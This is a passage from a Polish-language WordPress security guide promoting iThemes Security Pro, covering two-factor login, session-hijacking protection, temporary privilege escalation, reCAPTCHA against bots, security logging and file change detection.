Korzystanie z uwierzytelniania dwuskładnikowego to najlepsza rzecz, jaką możesz zrobić, aby zabezpieczyć swój login WordPress. Uwierzytelnianie dwuskładnikowe to proces weryfikacji tożsamości osoby, wymagający dwóch oddzielnych metod weryfikacji. Google udostępnił na swoim blogu, że korzystanie z uwierzytelniania dwuskładnikowego może powstrzymać 100% automatycznych ataków botów. Bardzo lubię te szanse.

Funkcja uwierzytelniania dwuskładnikowego iThemes Security Pro zapewnia dużą elastyczność podczas wdrażania 2fa w witrynie. Możesz włączyć dwuskładnikowość dla wszystkich lub niektórych użytkowników, a także możesz zmusić użytkowników wysokiego poziomu do korzystania z 2fa przy każdym logowaniu.

Dla Twojej wygody iThemes Security Pro oferuje 2 różne metody uwierzytelniania dwuskładnikowego.

1. Aplikacja mobilna — metoda aplikacji mobilnej jest najbezpieczniejszą metodą uwierzytelniania dwuskładnikowego zapewnianą przez iThemes Security Pro. Ta metoda wymaga korzystania z bezpłatnej dwuskładnikowej aplikacji mobilnej, takiej jak Authy.
2. E - mail — dwuskładnikowa metoda e-mail wyśle ​​kody wrażliwe na czas na adres e-mail użytkownika.
3. Kody zapasowe — zestaw kodów jednorazowych, których można użyć do logowania w przypadku utraty podstawowej metody dwuskładnikowej.

5. Zabezpiecz użytkowników WordPressa przed przejęciem sesji

WordPress generuje sesyjny plik cookie za każdym razem, gdy logujesz się do swojej witryny. Załóżmy, że masz rozszerzenie przeglądarki, które zostało porzucone przez programistę i nie wydaje już aktualizacji zabezpieczeń. Na nieszczęście dla Ciebie zaniedbane rozszerzenie przeglądarki ma lukę. Luka pozwala złym podmiotom przejąć pliki cookie przeglądarki, w tym wspomniany wcześniej plik cookie sesji WordPress. Ten rodzaj hakowania jest znany jako przejęcie sesji . Atakujący może więc wykorzystać lukę rozszerzenia, aby odłączyć Twój login i zacząć wprowadzać złośliwe zmiany z Twoim użytkownikiem WordPress.

Powinieneś mieć włączoną ochronę przed przejęciem sesji dla administratorów i redaktorów.

Funkcja iThemes Security Pro Trusted Devices sprawia, że ​​przejmowanie sesji to już przeszłość. Jeśli urządzenie użytkownika ulegnie zmianie podczas sesji, iThemes Security automatycznie wyloguje użytkownika, aby zapobiec wszelkim nieautoryzowanym działaniom na koncie użytkownika, takim jak zmiana adresu e-mail użytkownika lub przesyłanie złośliwych wtyczek.

6. Stwórz uniwersalnego użytkownika wsparcia

Za każdym razem, gdy tworzysz nowego użytkownika, dodajesz kolejny punkt wejścia, który może wykorzystać haker. Ale prawdopodobnie będą chwile, gdy będziesz potrzebować pomocy z zewnątrz dla swojej witryny, na przykład gdy szukasz wsparcia lub po zatrudnieniu niezależnego wykonawcy. Potrzebujesz bezpiecznego sposobu na dodanie tymczasowego dostępu administratora do swojej witryny.

Załóżmy na przykład, że masz problemy z jedną z wtyczek zainstalowanych w Twojej witrynie. Po skontaktowaniu się z pomocą techniczną proszą administratora o dostęp do Twojej witryny, aby mogli przyjrzeć się bliżej. Wydaje się to całkiem rozsądną prośbą i decydujesz się przyznać im dostęp.

Jak więc dać komuś tymczasowy dostęp administratora do naszej witryny WordPress?

Przyznawanie zewnętrznego dostępu do Twojej witryny: dwie opcje

Zazwyczaj masz dwie możliwości zapewnienia zewnętrznego dostępu do swojej witryny…. i nie są świetne .

1. Udostępnij poświadczenia użytkownika

Pierwszą i najgorszą opcją jest udostępnienie nazwy użytkownika i hasła administratora WordPress.

Dlaczego udostępnianie poświadczeń administratora jest okropne

• Zmniejszone bezpieczeństwo — jeśli udostępnisz poświadczenia użytkownika, będziesz musiał wyłączyć uwierzytelnianie dwuskładnikowe, aby umożliwić osobie korzystającej z tych poświadczeń zalogowanie się. Google udostępnił na swoim blogu, że korzystanie z uwierzytelniania dwuskładnikowego lub weryfikacji dwuetapowej może powstrzymać 100% automatycznych ataków botów. Wyłączenie uwierzytelniania dwuskładnikowego, nawet na krótki czas, drastycznie zmniejsza bezpieczeństwo Twojej witryny.
• Niewygodne — udostępnianie poświadczeń wymaga zmiany hasła. Jeśli zapomnisz zmienić hasło, co najmniej jedna osoba ma dostęp administratora do Twojej witryny, kiedy tylko tego zechce.

2. Utwórz nowego użytkownika dla technika pomocy

Chociaż utworzenie zupełnie nowego użytkownika administratora dla specjalisty pomocy technicznej jest lepsze niż udostępnianie poświadczeń administratora, nadal nie jest to świetne.

Dlaczego tworzenie użytkownika do pomocy technicznej jest okropne

• Zwiększona podatność — utworzenie nowego użytkownika administratora dodaje kolejny punkt wejścia, który może zostać wykorzystany. Jeśli nie masz polityki dotyczącej haseł, dział pomocy technicznej może wybrać słabe hasło, przez co Twój login WordPress będzie bardziej podatny na ataki.
• Niewygodne – Przechodzenie przez proces konfigurowania nowego użytkownika za każdym razem, gdy potrzebujesz pomocy z zewnątrz, jest czasochłonne. Musisz utworzyć nowego użytkownika, a następnie pamiętać, aby usunąć użytkownika, gdy nie potrzebuje już dostępu do Twojej witryny. Jest to najlepsza praktyka bezpieczeństwa WordPress, aby usunąć wszystkich nieużywanych użytkowników z Twojej witryny.

Co to jest eskalacja uprawnień?

Funkcja eskalacji uprawnień iThemes Security Pro Privilege umożliwia tymczasowe przyznanie użytkownikowi dodatkowych możliwości.

Eskalacja uprawnień umożliwia łatwe i bezpieczne utworzenie uniwersalnego użytkownika, którego możesz udostępnić dowolnym zewnętrznym programistom lub technikom pomocy technicznej, którzy potrzebują tymczasowego dostępu do Twojej witryny.

Dzięki eskalacji uprawnień możesz utworzyć nowego użytkownika i nazwać go Support oraz nadać mu rolę subskrybenta. Następnym razem, gdy będziesz musiał zapewnić tymczasowy dostęp do swojej witryny, możesz zmienić użytkownika Wsparcia z subskrybenta na administratora. W dalszej części posta omówimy, jak to zrobić, ale najpierw porozmawiajmy o tym, dlaczego eskalacja uprawnień jest lepszym sposobem przyznawania dostępu do Twojej witryny.

Dlaczego eskalacja uprawnień jest lepsza

• Łatwy – nie musisz tworzyć nowego użytkownika za każdym razem, gdy chcesz przyznać dostęp do swojej witryny.
• Automatycznie — eskalacja uprawnień trwa tylko 24 godziny. Po upływie 24 godzin użytkownik automatycznie traci wszystkie dodatkowe uprawnienia. Nie musisz pamiętać o usuwaniu użytkowników lub zmianie haseł.
• Bez poświęcenia w zakresie bezpieczeństwa – nadal możesz wymagać od tego uniwersalnego użytkownika wsparcia, aby używał dwuskładnikowej metody e-mail do logowania, co oznacza, że ​​masz taki sam poziom bezpieczeństwa, jak w przypadku innych administratorów. Ponieważ rzeczywista rola użytkownika to subskrybent, nie istnieje żadne realne ryzyko pozostawienia jej na swojej stronie internetowej.

Jak korzystać z eskalacji uprawnień w iThemes Security Pro

Aby rozpocząć, włącz Eskalację uprawnień na głównej stronie ustawień zabezpieczeń.

Możesz utworzyć nowego użytkownika i nazwać go Support oraz nadać mu rolę użytkownika Subskrybent. Następnym razem, gdy będziesz musiał zapewnić tymczasowy dostęp do swojej witryny, przejdź do strony profilu użytkownika pomocy technicznej.

Zaktualizuj adres e-mail, aby osoba z zewnątrz mogła poprosić o nowe hasło. Następnie przewiń w dół, aż zobaczysz ustawienia Tymczasowej eskalacji uprawnień. Kliknij przełącznik Ustaw rolę tymczasową i wybierz opcję Administrator. Użytkownik będzie miał teraz dostęp administracyjny przez następne 24 godziny.

Jeśli nie potrzebują pełnych 24 godzin, możesz odwołać eskalację uprawnień na stronie profilu użytkownika. Jeśli potrzebujesz więcej niż 24 godziny, możesz ustawić dokładną liczbę dni, których potrzebujesz w polu Dni .

Zawijanie

Popularność WordPressa sprawia, że ​​jest celem hakerów na całym świecie. Jak już wspomnieliśmy, atakujący może wyrządzić szkody, hakując nawet najniższy poziom użytkownika WordPressa.

Dobrą wiadomością jest to, że chociaż nie ma sposobu, aby zapobiec atakom na użytkowników WordPressa, przy odrobinie wysiłku z naszej strony możemy zapobiec sukcesowi ataków.

Sekcja 8: Chroń swoją witrynę przed złymi botami

W tej sekcji przewodnika po bezpieczeństwie WordPress dowiesz się, czym jest bot i jak blokować złe boty przed sianiem spustoszenia w Twojej witrynie.

Co to jest bot?

Bot to oprogramowanie zaprogramowane do wykonywania określonej listy zadań. Deweloperzy tworzą zestaw instrukcji, które bot będzie wykonywał automatycznie, bez konieczności proszenia ich przez programistę o rozpoczęcie pracy. Boty będą wykonywać powtarzalne i przyziemne zadania znacznie szybciej niż my.

Różne boty nieustannie indeksują Twoją witrynę. Niektóre z tych botów są dobre i zapewniają cenną usługę. Inne boty mają bardziej nikczemne motywy. Porozmawiajmy przez chwilę o tym, czym jest bot i jakie są jego typy.

Dobre boty

Monitorowanie botów – iThemes Sync Pro Uptime Monitoring wykorzystuje bota do monitorowania czasu działania Twojej witryny. Bot sprawdza Twoją witrynę co 5 minut, aby sprawdzić, czy nadal jest online. Jeśli Twoja witryna nie działa, bot wyśle ​​​​Ci alert, dzięki czemu możesz przywrócić witrynę do trybu online.

Boty audytowe – iThemes Sync Pro Site Audit wykorzystuje bota Google Lighthouse do sprawdzania jakości Twoich stron internetowych. Innym doskonałym przykładem bota audytowego jest uszkodzony moduł sprawdzania linków, który przemierzy Twoją witrynę w poszukiwaniu linków, które przekierują Cię do lokalizacji, która nie istnieje.

Feeder Bots – Doskonałym przykładem bota feedera jest Twój odtwarzacz podcastów. Twój odtwarzacz podcastów używa bota do monitorowania kanałów RSS podcastów, które subskrybujesz, i ostrzega Cię, gdy Twój ulubiony podcast opublikuje nowy odcinek.

Boty wyszukiwarek – Robot internetowy Google jest przykładem bota wyszukiwarki. Ten typ bota przemierzy Twoją witrynę w poszukiwaniu nowych lub zmodyfikowanych stron i utworzy indeks Twojej witryny. Gdy Google lub inna wyszukiwarka ma indeks Twojej witryny, będą mogli udostępniać Twoje strony osobom korzystającym z ich wyszukiwarki.

Boty bezpieczeństwa – iThemes Security Pro Site Scan wykorzystuje bota do porównywania listy zainstalowanych wtyczek i motywów z naszą bazą danych o lukach w zabezpieczeniach. Jeśli masz zainstalowaną wtyczkę lub motyw ze znaną luką, bot automatycznie zastosuje łatkę, jeśli jest dostępna.

Złe boty

Boty do usuwania treści — te boty są zaprogramowane do pobierania zawartości Twojej witryny bez Twojej zgody. Bot może powielać zawartość, aby wykorzystać ją na stronie atakującego, aby poprawić SEO i ukraść ruch w witrynie.

Spamboty – Spamboty są denerwujące. Będą zepsuć twoje komentarze obietnicami zostania milionerem podczas pracy w domu w nadziei, że wyślą odwiedzających na złośliwe strony internetowe.

Brute Force Bots – Boty Brute Force przeczesują internet w poszukiwaniu loginów WordPress, aby zaatakować. Gdy te boty wylądują na stronie logowania, spróbują najprostszej formy uzyskania dostępu do witryny: próbując odgadnąć nazwy użytkownika i hasła w kółko, aż do skutku.

Jak blokować złe boty bez blokowania dobrych botów: reCAPTCHA V3

Google reCAPTCHA pomaga powstrzymać złe boty przed angażowaniem się w nadużycia w Twojej witrynie, takie jak próby włamania się do Twojej witryny przy użyciu złamanych haseł, publikowanie spamu, a nawet skrobanie treści.

Jednak prawowici użytkownicy będą mogli się logować, dokonywać zakupów, przeglądać strony lub tworzyć konta. reCAPTCHA wykorzystuje zaawansowane techniki analizy ryzyka, aby odróżnić ludzi od botów.

Funkcja Google reCAPTCHA w iThemes Security Pro chroni Twoją witrynę przed złymi botami. Te boty próbują włamać się do Twojej witryny za pomocą złamanych haseł, zamieszczają spam, a nawet wykradają zawartość. reCAPTCHA wykorzystuje zaawansowane techniki analizy ryzyka, aby odróżnić ludzi od botów.

Wspaniałą cechą reCAPTCHA w wersji 3 jest to, że pomaga wykrywać nadużycia w witrynie bez interakcji użytkownika. Zamiast pokazywać wyzwanie CAPTCHA, reCAPTCHA v3 monitoruje różne żądania wysyłane w Twojej witrynie i zwraca wynik dla każdego żądania. Wynik waha się od 0,01 do 1. Im wyższy wynik zwrócony przez reCAPTCHA, tym większa pewność, że człowiek złożył prośbę. Im niższy wynik zwrócony przez reCAPTCHA, tym większa pewność, że bot wysłał żądanie.

iThemes Security Pro pozwala ustawić próg blokowania za pomocą wyniku reCAPTCHA. Google zaleca używanie 0,5 jako domyślnego. Pamiętaj, że możesz nieumyślnie zablokować uprawnionych użytkowników, jeśli ustawisz zbyt wysoki próg.

Możesz włączyć reCAPTCHA podczas rejestracji użytkownika WordPress, zresetować hasło, login i komentarze. iThemes Security Pro umożliwia uruchamianie skryptu Google reCAPTCHA na wszystkich stronach, aby zwiększyć dokładność wyniku bota w porównaniu z wynikiem ludzkim.

Zawijanie

Są dobre i złe boty. reCAPTCHA blokuje złe boty w Twojej witrynie, nie wchodząc w drogę dobrym botom, które zapewniają wartość.

Sekcja 9: Dzienniki bezpieczeństwa WordPress

Rejestrowanie jest istotną częścią Twojej strategii bezpieczeństwa WordPress. Niewystarczające rejestrowanie i monitorowanie może prowadzić do opóźnienia w wykryciu naruszenia bezpieczeństwa. Większość badań nad naruszeniami pokazuje, że czas na wykrycie naruszenia wynosi ponad 200 dni! Taka ilość czasu pozwala atakującemu na włamanie się do innych systemów, modyfikację, kradzież lub zniszczenie większej ilości danych. To z tych powodów Insufficient Logging znalazł się na liście 10 największych zagrożeń bezpieczeństwa aplikacji internetowych OWASP.

Dzienniki bezpieczeństwa WordPress mają kilka zalet w ogólnej strategii bezpieczeństwa.

1. Tożsamość i powstrzymanie złośliwego zachowania.
2. Dostrzeż aktywność, która może ostrzec Cię o naruszeniu.
3. Oceń, ile szkód zostało wyrządzonych.
4. Pomoc w naprawie zhakowanej witryny.

Jeśli Twoja witryna zostanie zhakowana, będziesz potrzebować najlepszych informacji, aby pomóc w szybkim dochodzeniu i odzyskaniu.

Czym są dzienniki bezpieczeństwa WordPress?

Dzienniki bezpieczeństwa WordPress w iThemes Security Pro śledzi ważne zdarzenia związane z bezpieczeństwem, które występują w Twojej witrynie. Zdarzenia te są ważne do monitorowania, aby wskazać, czy lub kiedy nastąpi naruszenie bezpieczeństwa.

Dzienniki bezpieczeństwa Twojej witryny są istotną częścią każdej strategii bezpieczeństwa. Informacje znalezione w tych rekordach mogą zostać wykorzystane do zablokowania złych podmiotów, wyróżnienia niechcianej zmiany w witrynie oraz pomocy w zidentyfikowaniu i poprawieniu punktu wejścia udanego ataku.

Zdarzenia bezpieczeństwa śledzone i rejestrowane przez iThemes Security

Oto spojrzenie na zdarzenia związane z bezpieczeństwem WordPress śledzone przez wtyczkę iThemes Security Pro.

1. Ataki brutalnej siły WordPress

Ataki typu brute force odnoszą się do metody prób i błędów wykorzystywanej do wykrywania nazw użytkowników i haseł w celu włamania się na stronę internetową. WordPress nie śledzi żadnej aktywności związanej z logowaniem użytkowników, więc nie ma nic wbudowanego w WordPress, aby chronić Cię przed atakiem brute force. To do Ciebie należy monitorowanie bezpieczeństwa logowania, aby chronić witrynę WordPress.

Na szczęście atak brute force nie jest zbyt wyrafinowany i dość łatwo go zidentyfikować w dziennikach. Musisz zarejestrować nazwę użytkownika i adres IP, który próbuje się zalogować oraz czy logowanie się powiodło. Jeśli zauważysz, że pojedyncza nazwa użytkownika lub adres IP ma kolejne nieudane próby logowania, prawdopodobnie jesteś poddawany atakowi brute force.

Gdy dowiesz się, że Twoja witryna jest atakowana, możesz ją powstrzymać! Należy pamiętać, że nie ma sposobu, aby zapobiec atakowi na Twoją witrynę. Jednak monitorując nieprawidłowe próby logowania, możesz zapobiec ich powodzeniu.

iThemes Security Pro jest świetny w blokowaniu złych facetów. Jeśli jednak zły facet użyje nazwy użytkownika Bob w ataku brute force, a Bob jest rzeczywistym użytkownikiem witryny, Bob zostanie niestety zablokowany wraz z atakującym.

Nawet jeśli powstrzymywanie złoczyńców przed włamywaniem się do witryny jest wspaniałym uczuciem, nie podoba nam się, gdy bezpieczeństwo wpływa na wrażenia prawdziwych użytkowników. Stworzyliśmy Magic Links, aby umożliwić legalnym użytkownikom ominięcie blokady nazwy użytkownika, podczas gdy atakujący metodą brute force pozostaje zablokowany.

2. Skanowanie złośliwego oprogramowania

Powinieneś nie tylko uruchamiać skanowanie w poszukiwaniu złośliwego oprogramowania, ale także rejestrować wyniki każdego skanowania złośliwego oprogramowania w dziennikach bezpieczeństwa WordPress. Niektóre dzienniki bezpieczeństwa rejestrują tylko wyniki skanowania, które wykryły złośliwe oprogramowanie, ale to nie wystarczy. Bardzo ważne jest, aby jak najszybciej zostać zaalarmowanym o włamaniu do Twojej witryny. Im więcej czasu zajmie Ci informacja o włamaniu, tym więcej szkód wyrządzi.

Chociaż dobrze jest widzieć, jak historia proaktywnego podejścia do bezpieczeństwa się opłaca, jest to tylko bonus, a nie powód do rejestrowania każdego skanowania złośliwego oprogramowania.

Jeśli nie dokumentujesz zaplanowanych skanów, nie będziesz mieć możliwości sprawdzenia, czy wystąpiły jakiekolwiek błędy skanowania. Niezapisywanie nieudanych skanowań może sprawić, że pomyślisz, że Twoja witryna jest codziennie sprawdzana pod kątem złośliwego oprogramowania, ale w rzeczywistości skanowanie się nie kończy.

Przeczytaj artykuł o funkcji Skanowanie witryny, aby dowiedzieć się, w jaki sposób iThemes Security Pro może chronić Cię przed główną przyczyną włamań do WordPressa.

3. Aktywność użytkownika

Prowadzenie rejestru aktywności użytkowników w dziennikach bezpieczeństwa WordPressa może być ratunkiem po udanym ataku.

Jeśli monitorujesz poprawną aktywność użytkowników, może poprowadzić Cię przez oś czasu włamania i pokazać wszystko, co zmienił haker, od dodawania nowych użytkowników po dodawanie niechcianych reklam farmaceutycznych w Twojej witrynie.

iThemes Security Pro monitoruje 5 rodzajów aktywności użytkowników:

1. Zaloguj się / Wyloguj

Pierwszym rodzajem zarejestrowanej aktywności użytkownika jest logowanie i wylogowywanie się z Twojej witryny oraz skąd. Monitorowanie czasu i lokalizacji logowań użytkownika może pomóc w wykryciu użytkownika, który jest zagrożony. Czy ten użytkownik zalogował się w nietypowym czasie lub z nowego miejsca? Jeśli tak, możesz rozpocząć od nich dochodzenie.

2. Tworzenie / rejestracja użytkownika

Następną czynnością, którą należy zachować, jest tworzenie użytkowników, w szczególności tworzenie użytkowników Administrator. Jeśli haker może narazić legalnego użytkownika na szwank, może utworzyć tam własnego administratora, próbując zostać ukrytym. Łatwo zauważyć coś dziwnego na swoim koncie, ale znacznie trudniej jest zidentyfikować złośliwą aktywność innego użytkownika.

Niezbędne jest również monitorowanie rejestracji użytkowników. Niektóre luki w zabezpieczeniach umożliwiają hakerom zmianę domyślnej roli nowego użytkownika z subskrybenta na administratora.

Jeśli ustawiono Rejestrowanie użytkowników tylko na monitorowanie aktywności użytkowników Administratora, tylko rejestracja nowego użytkownika Administratora będzie zapisywana w dziennikach bezpieczeństwa. Tak więc, jeśli kiedykolwiek zobaczysz nowo zarejestrowanego użytkownika w swoich dziennikach bezpieczeństwa, coś poszło nie tak.

3. Dodawanie i usuwanie wtyczek

Ważne jest, aby rejestrować, kto dodaje i usuwa wtyczki. Gdy Twoja witryna zostanie zhakowana, osoba atakująca z łatwością doda swoją niestandardową wtyczkę w celu wstrzyknięcia złośliwego kodu do witryny.

Nawet jeśli haker nie ma dostępu do Twojego serwera lub bazy danych, nadal może wprowadzać w nich zmiany z pulpitu WordPress. Korzystając z wtyczki, mogą dodać przekierowania do Twojej witryny, aby użyć ich w następnej kampanii spamerskiej, lub wstrzyknąć złośliwe oprogramowanie do Twojej bazy danych. Po wykonaniu złośliwego kodu mogą usunąć wtyczkę, aby usunąć dowody popełnienia przestępstwa. Na szczęście dla nas nic z tego nie umknie, ponieważ zostało to udokumentowane w naszych dziennikach bezpieczeństwa WordPress.

4. Przełączanie motywów

Inną aktywnością użytkownika monitorowaną przez iThemes Security Pro User Logging jest zmiana motywu witryny. Jeśli kiedykolwiek zauważysz, że Twój motyw nieoczekiwanie się zmienił, możesz zajrzeć do dzienników bezpieczeństwa WordPress, aby dowiedzieć się, kto dokonał zmiany.

5. Zmiany w postach i stronach

Na koniec chcesz monitorować wszelkie zmiany w swoim poście i na stronach. Czy dodano jakieś linki, które przekierowują ruch do innych witryn? Monitorowanie postów i stron może pomóc Ci znaleźć wstydliwe strony lub złośliwe linki dodane do Twojej witryny po naruszeniu.

Aby dowiedzieć się, który post został zmodyfikowany, kliknij łącze Wyświetl szczegóły, aby znaleźć identyfikator posta.

Zapoznaj się z wpisem na temat funkcji rejestrowania użytkowników, aby dowiedzieć się więcej o tym, jak monitorowanie aktywności użytkowników może pomóc Ci wrócić po włamaniu.

Zawijanie

Niewystarczające rejestrowanie jest jednym z 10 największych zagrożeń bezpieczeństwa aplikacji internetowych OWASP. Monitorowanie właściwego zachowania pomoże Ci zidentyfikować i powstrzymać ataki, wykryć naruszenie oraz uzyskać dostęp i naprawić szkody wyrządzone Twojej witrynie po udanym ataku.

Sekcja 10: Kiedy dochodzi do katastrofy bezpieczeństwa WordPress

Nawet jeśli zastosujesz się do najlepszych praktyk bezpieczeństwa WordPress, nadal istnieje szansa, że ​​Twoja witryna zostanie naruszona. Kompromis oznacza, że ​​haker włamał się do Twojej witryny i zainfekował ją złośliwym oprogramowaniem.

Co to jest naruszenie bezpieczeństwa?

Naruszenie bezpieczeństwa ma miejsce, gdy cyberprzestępca może uzyskać nieautoryzowany dostęp do Twojej witryny lub serwera. Naruszenia bezpieczeństwa mogą wystąpić na wiele różnych sposobów, ponieważ hakerzy wykorzystują niektóre z najczęstszych problemów związanych z bezpieczeństwem WordPressa. Od uruchamiania przestarzałych wersji wtyczek i motywów po bardziej skomplikowane wstrzyknięcia SQL, naruszenie bezpieczeństwa może przydarzyć się nawet najbardziej czujnym właścicielom witryn.

Czas wykryć naruszenie bezpieczeństwa: kluczowy czynnik w czyszczeniu zainfekowanej strony internetowej

Czy wiesz, że średni czas wykrycia włamania do witryny to 200 dni? Niestety, im dłużej trwa zauważenie naruszenia, tym więcej szkód haker może wyrządzić Twojej witrynie, Twoim klientom i Tobie. Kawałek złośliwego oprogramowania może spowodować oszałamiające szkody w ciągu 200 dni. Dlatego tak ważne jest skrócenie czasu potrzebnego na wykrycie naruszenia bezpieczeństwa.

Czemu? Oczyszczanie i przestoje, których będziesz potrzebować, aby wyczyścić witrynę po 200 dniach uszkodzeń, również są oszałamiające. Czas na zbadanie wszystkiego, czego dotknęło złośliwe oprogramowanie i które dane klienta zostały skradzione, tylko się wydłuża, podczas gdy naruszenie pozostaje niewykryte. Nie wspominając o czasie, który będziesz musiał poświęcić na informowanie klientów, że muszą anulować swoje karty kredytowe, ponieważ haker zarejestrował wszystkie naciśnięcia klawiszy podczas odwiedzania Twojej witryny.

Koszt zhakowania jest ogromny. Musisz zapłacić komuś za zbadanie naruszenia i wyczyszczenie witryny. Specjalista ds. naprawy hakerów będzie musiał wyłączyć Twoją witrynę podczas pracy, a ludzie nie będą mogli dokonywać nowych zakupów, gdy Twoja witryna nie działa. Po utracie zaufania klienta prawdopodobnie stracisz wszelkie przyszłe zakupy, które by ci dali.

Koszt włamania sprawia, że ​​tak ważne jest jak najszybsze zauważenie włamania. Im szybciej odkryjesz naruszenie, tym szybciej możesz powstrzymać dalsze szkody i tym szybciej możesz przywrócić swoją witrynę i firmę do Internetu.

Czy skanery złośliwego oprogramowania wystarczą?

Skanery złośliwego oprogramowania umożliwiają przeskanowanie witryny WordPress pod kątem znanych złośliwych plików i skryptów. Ale czy skanery złośliwego oprogramowania wystarczą, aby wykryć naruszenie bezpieczeństwa?

Jednym słowem nie. Nie myśl, że możesz polegać wyłącznie na skanerze złośliwego oprogramowania, aby sprawdzić, czy Twoja witryna jest zainfekowana. Żaden skaner złośliwego oprogramowania nie jest w stanie zidentyfikować każdego istniejącego złośliwego oprogramowania. Jeśli natkniesz się na skaner złośliwego oprogramowania, który twierdzi, że jest w 100% dokładny, powinieneś go uruchomić, ponieważ skany, które zawierają takie twierdzenia, są często najmniej dokładne.

Sygnatura a wykrywanie złośliwego oprogramowania behawioralnego

Większość skanów złośliwego oprogramowania i oprogramowania antywirusowego wykorzystuje sygnatury złośliwego oprogramowania do wykrywania złośliwego oprogramowania. Bardziej zaawansowane skanowanie w poszukiwaniu złośliwego oprogramowania będzie wykorzystywać połączenie wykrywania sygnatur i analizy behawioralnej.

Sygnatury złośliwego oprogramowania

Sygnatura złośliwego oprogramowania to seria bajtów używanych do identyfikowania znanych fragmentów złośliwego oprogramowania. Niektóre skanery złośliwego oprogramowania są zasilane przez bazę danych zawierającą sygnatury złośliwego oprogramowania milionów znanych wirusów.

Skanowanie w oparciu o sygnatury złośliwego oprogramowania jest szybkie, proste i wykrywa 100% znanych i dobrze poznanych elementów złośliwego oprogramowania. Wszystko to jest świetne i złapie złośliwe oprogramowanie dodane przez hakerów niskiego poziomu.

Jednak wykwalifikowani hakerzy wiedzą, że skanery złośliwego oprogramowania sprawdzają sygnatury znanego złośliwego oprogramowania. Ci hakerzy mają możliwość zaciemniania sygnatur złośliwego oprogramowania, aby pozostać niewykrytym przez przeciętny skaner.

Nowe złośliwe oprogramowanie jest publikowane w tempie, w którym skanery złośliwego oprogramowania nie mogą aktualizować swojej bazy danych wszystkimi najnowszymi sygnaturami. Tak więc skaner oparty na sygnaturach nie będzie w stanie odróżnić nowego złośliwego oprogramowania od pliku readme.txt wtyczki.

Analiza behawioralna

Analiza behawioralna sprawdza działania oprogramowania w celu określenia, czy jest ono złośliwe. Istnieje mnóstwo różnych rodzajów zachowań, które można uznać za podejrzane lub złośliwe. Na przykład iThemes Security Pro Site Scan wykorzystuje interfejs Google Safe Browsing API, aby zapewnić bezpieczeństwo witryn internetowych. Bezpieczne przeglądanie Google sprawdzi, czy jakieś oprogramowanie nie przekierowuje ruchu do znanej złośliwej witryny.

Ponownie, nie ma niezawodnej metody wykrywania złośliwego oprogramowania. Jednak połączenie kontroli behawioralnej i weryfikacji podpisów znacznie zwiększy Twoje szanse na otrzymanie ostrzeżenia o dowodach naruszenia bezpieczeństwa.

Jakie zachowanie udostępnia wszystkie złośliwe oprogramowanie?

Wiemy, jak ważne jest jak najszybsze wykrycie naruszenia bezpieczeństwa i że poleganie wyłącznie na wykrywaniu złośliwego oprogramowania nie wystarczy. Zastanawialiśmy się więc, w jaki sposób iThemes Security Pro może skrócić czas potrzebny ludziom na wykrycie naruszeń bezpieczeństwa na swoich stronach internetowych?

Chociaż rodzaj szkód powodowanych przez złośliwe oprogramowanie w Twojej witrynie jest bardzo różny, to, co robi, można sprowadzić do jednej lub kombinacji następujących trzech rzeczy.

1. Dodaj pliki — złośliwe oprogramowanie w postaci oprogramowania szpiegującego może dodać złośliwy plik, który będzie rejestrować naciśnięcia klawiszy przez klientów podczas wprowadzania informacji o karcie kredytowej.
2. Usuń pliki — niektóre złośliwe oprogramowanie usunie prawidłowy plik i zastąpi go złośliwym plikiem o tej samej nazwie.
3. Modyfikuj pliki — złośliwe oprogramowanie będzie próbowało ukryć swój złośliwy kod, ukrywając go w istniejącym pliku, który modyfikuje.

Czy nie byłoby miło być powiadamianym o nieoczekiwanych zmianach w witrynie, aby móc je sprawdzić pod kątem oznak naruszenia bezpieczeństwa?

Jak skrócić czas potrzebny na wykrycie naruszenia bezpieczeństwa?

Kluczem do szybkiego wykrycia naruszenia bezpieczeństwa jest monitorowanie zmian w plikach w Twojej witrynie.

Funkcja wykrywania zmian plików w iThemes Security Pro przeskanuje pliki Twojej witryny i powiadomi Cię, gdy nastąpią zmiany w Twojej witrynie.

Istnieje kilka uzasadnionych powodów, dla których w dziennikach mogą pojawić się nowe zmiany plików, ale jeśli wprowadzone zmiany były nieoczekiwane, należy poświęcić trochę czasu, aby upewnić się, że zmiany nie są złośliwe. Na przykład, jeśli zauważysz zmianę wprowadzoną we wtyczce w tym samym dniu io tej samej godzinie, w której ją zaktualizowałeś, nie ma powodu, aby badać.

Jak włączyć wykrywanie zmian plików w iThemes Security Pro

Aby rozpocząć monitorowanie zmian plików, włącz Wykrywanie zmian plików na głównej stronie ustawień zabezpieczeń.

Po włączeniu wykrywania zmian plików iThemes Security Pro rozpocznie skanowanie wszystkich plików witryny w kawałkach . Skanowanie plików porcjami pomoże zmniejszyć zasoby wymagane do monitorowania zmian w plikach.

Początkowe skanowanie zmian plików utworzy indeks plików witryny i ich skrótów. Hash pliku to skrócona, nieczytelna dla człowieka wersja zawartości pliku.

Po zakończeniu wstępnego skanowania iThemes Security Pro będzie kontynuował skanowanie pliku porcjami. Jeśli skrót pliku zmieni się podczas jednego z kolejnych skanowań, oznacza to, że zawartość pliku uległa zmianie.

Możesz także uruchomić ręczną zmianę pliku, klikając przycisk Skanuj pliki teraz w ustawieniach wykrywania zmian plików

Aktywacja wiadomości e-mail z powiadomieniem o zmianie pliku

Zmiany w plikach zdarzają się cały czas, a otrzymanie powiadomienia e-mail o każdej zmianie szybko stałoby się przytłaczające. I zanim się zorientujesz, staje się chłopcem, który wypłakał sytuację wilka i zaczynasz całkowicie ignorować alerty o zmianie pliku.

Przyjrzyjmy się, w jaki sposób iThemes Security Pro inteligentnie identyfikuje uzasadnione zmiany w celu zmniejszenia liczby powiadomień i jak można wyciszyć powiadomienia dla plików, które mają być często aktualizowane.

Możesz zarządzać wszystkimi powiadomieniami bezpieczeństwa iThemes z Centrum powiadomień we wtyczce iThemes Security. W panelu administratora WordPress przejdź do sekcji Bezpieczeństwo > Ustawienia i znajdź moduł Centrum powiadomień .

W jaki sposób iThemes Security Pro identyfikuje uzasadnione zmiany plików

Istnieje kilka sposobów, dzięki którym iThemes Security Pro może wykryć, czy zmiana wprowadzona w pliku była uzasadniona i nie stanowiła powodu do niepokoju. iThemes Security Pro nie utworzy powiadomienia o zmianie pliku dla zmian, które może zweryfikować.

1. Aktualizacje wtyczek/motywów zakończone przez zarządzanie wersjami

Funkcja zarządzania wersjami w iThemes Security Pro umożliwia automatyczną aktualizację WordPressa, wtyczek i motywów.

Jeśli aktualizacja zostanie ukończona przez zarządzanie wersjami, iThemes Security Pro będzie znał źródło aktualizacji i nie wywoła alertu.

